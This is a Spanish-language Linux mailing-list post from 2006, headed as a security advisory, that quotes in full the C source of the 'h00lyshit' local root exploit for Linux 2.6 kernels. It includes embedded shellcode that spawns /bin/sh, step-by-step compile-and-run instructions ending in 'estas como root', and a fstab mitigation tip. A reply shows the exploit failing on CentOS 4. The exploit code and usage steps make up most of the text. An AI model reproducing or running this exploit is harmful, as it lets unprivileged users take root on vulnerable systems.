aviso de seguridad - importante ver EXPLOIT adjunto

dblackbeer dblackbeer en gmail.com
Mie Jul 19 17:54:03 CLT 2006


2006/7/19, Felipe Tornvall <lpct en pctools.cl>:
> hola lista.... arreglar fstab
>
>
>
> proc            /proc           proc    defaults        0       0
>
> agregarlo a la primera linea.... si ya esta... no hay de q preocuparse
> prueba:
> crear archivo de 100 mg enb la home del user
> yes > xxx
> luego compilar
> gcc -o archivo source.c
> ejecutar
> ./archivo xxx
> y listo !! estas como root
>
> bajo amd64 no corre pero si me funciono en un sarge i386 pero los instalados
> hace una semana no pasa nada.... (via net install)
>
>
> *
> ** Author: h00lyshit
> ** Vulnerable: Linux 2.6 ALL
> ** Type of Vulnerability: Local Race
> ** Tested On : various distros
> ** Vendor Status: unknown
> **
> ** Disclaimer:
> ** In no event shall the author be liable for any damages
> ** whatsoever arising out of or in connection with the use
> ** or spread of this information.
> ** Any use of this information is at the user's own risk.
> **
> ** Compile:
> ** gcc h00lyshit.c -o h00lyshit
> **
> ** Usage:
> ** h00lyshit <very big file on the disk>
> **
> ** Example:
> ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
> **
> ** if y0u dont have one, make big file (~100MB) in /tmp with dd
> ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
> **
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <sched.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <sys/prctl.h>
> #include <sys/mman.h>
> #include <sys/wait.h>
> #include <linux/a.out.h>
> #include <asm/unistd.h>
>
>
> static struct exec ex;
> static char *e[256];
> static char *a[4];
> static char b[512];
> static char t[256];
> static volatile int *c;
>
>
> /*      h00lyshit shell code            */
> __asm__ ("      __excode:       call    1f                      \n"
>          "      1:              mov     $23, %eax               \n"
>          "                      xor     %ebx, %ebx              \n"
>          "                      int     $0x80                   \n"
>          "                      pop     %eax                    \n"
>          "                      mov     $cmd-1b, %ebx           \n"
>          "                      add     %eax, %ebx              \n"
>          "                      mov     $arg-1b, %ecx           \n"
>          "                      add     %eax, %ecx              \n"
>          "                      mov     %ebx, (%ecx)            \n"
>          "                      mov     %ecx, %edx              \n"
>          "                      add     $4, %edx                \n"
>          "                      mov     $11, %eax               \n"
>          "                      int     $0x80                   \n"
>          "                      mov     $1, %eax                \n"
>          "                      int     $0x80                   \n"
>          "      arg:            .quad   0x00, 0x00              \n"
>          "      cmd:            .string         \"/bin/sh\"     \n"
>          "      __excode_e:     nop                             \n"
>          "      .global         __excode                        \n"
>          "      .global         __excode_e                      \n"
>         );
>
>
>
> extern void (*__excode) (void);
> extern void (*__excode_e) (void);
>
>
> void
> error (char *err)
> {
>   perror (err);
>   fflush (stderr);
>   exit (1);
> }
>
>
> /*      exploit this shit       */
> void
> exploit (char *file)
> {
>   int i, fd;
>   void *p;
>   struct stat st;
>
>   printf ("\ntrying to exploit %s\n\n", file);
>   fflush (stdout);
>   chmod ("/proc/self/environ", 04755);
>   c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0,
> 0);
>   memset ((void *) c, 0, 4096);
>
>   /*      slow down machine       */
>   fd = open (file, O_RDONLY);
>   fstat (fd, &st);
>   p =
>     (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
>   if (p == MAP_FAILED)
>     error ("mmap");
>   prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
>   sprintf (t, "/proc/%d/environ", getpid ());
>   sched_yield ();
>   execve (NULL, a, e);
>   madvise (0, 0, MADV_WILLNEED);
>   i = fork ();
>
>   /*      give it a try           */
>   if (i)
>     {
>       (*c)++;
>       !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
>       prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
>       sched_yield ();
>     }
>   else
>     {
>             nice(10);
>             while (!(*c));
>                 sched_yield ();
>       execve (t, a, e);
>       error ("failed");
>     }
>
>   waitpid (i, NULL, 0);
>   exit (0);
> }
>
>
> int
> main (int ac, char **av)
> {
>   int i, j, k, s;
>   char *p;
>
>   memset (e, 0, sizeof (e));
>   memset (a, 0, sizeof (a));
>   a[0] = strdup (av[0]);
>   a[1] = strdup (av[0]);
>   a[2] = strdup (av[1]);
>
>   if (ac < 2)
>     error ("usage: binary <big file name>");
>   if (ac > 2)
>     exploit (av[2]);
>   printf ("\npreparing");
>   fflush (stdout);
>
>   /*      make setuid a.out       */
>   memset (&ex, 0, sizeof (ex));
>   N_SET_MAGIC (ex, NMAGIC);
>   N_SET_MACHTYPE (ex, M_386);
>   s = ((unsigned) &__excode_e) - (unsigned) &__excode;
>   ex.a_text = s;
>   ex.a_syms = -(s + sizeof (ex));
>
>   memset (b, 0, sizeof (b));
>   memcpy (b, &ex, sizeof (ex));
>   memcpy (b + sizeof (ex), &__excode, s);
>
>   /*      make environment        */
>   p = b;
>   s += sizeof (ex);
>   j = 0;
>   for (i = k = 0; i < s; i++)
>     {
>       if (!p[i])
>         {
>           e[j++] = &p[k];
>           k = i + 1;
>         }
>     }
>
>   /*      reexec                  */
>   getcwd (t, sizeof (t));
>   strcat (t, "/");
>   strcat (t, av[0]);
>   execve (t, a, e);
>   error ("execve");
>   return 0;
> }
>
>
>
> --
> _______________________________________________
> Felipe Tornvall N.              lu: 400327
> w: http://freeby.pctools.cl
> w: http://docs.pctools.cl
> w: http://linux.pctools.cl
>
>
>

en centos 4 me dice esto:

[cosechero en maquina ~]$ ll xxx
-rw-rw-r--  1 gerardo gerardo 720244736 jul 19 18:51 xxx
[cosechero en maquina ~]$ ./archivo xxx

preparing
trying to exploit xxx

failed: Exec format error
[cosechero en maquina ~]$


-- 
cosechero


Más información sobre la lista de distribución Linux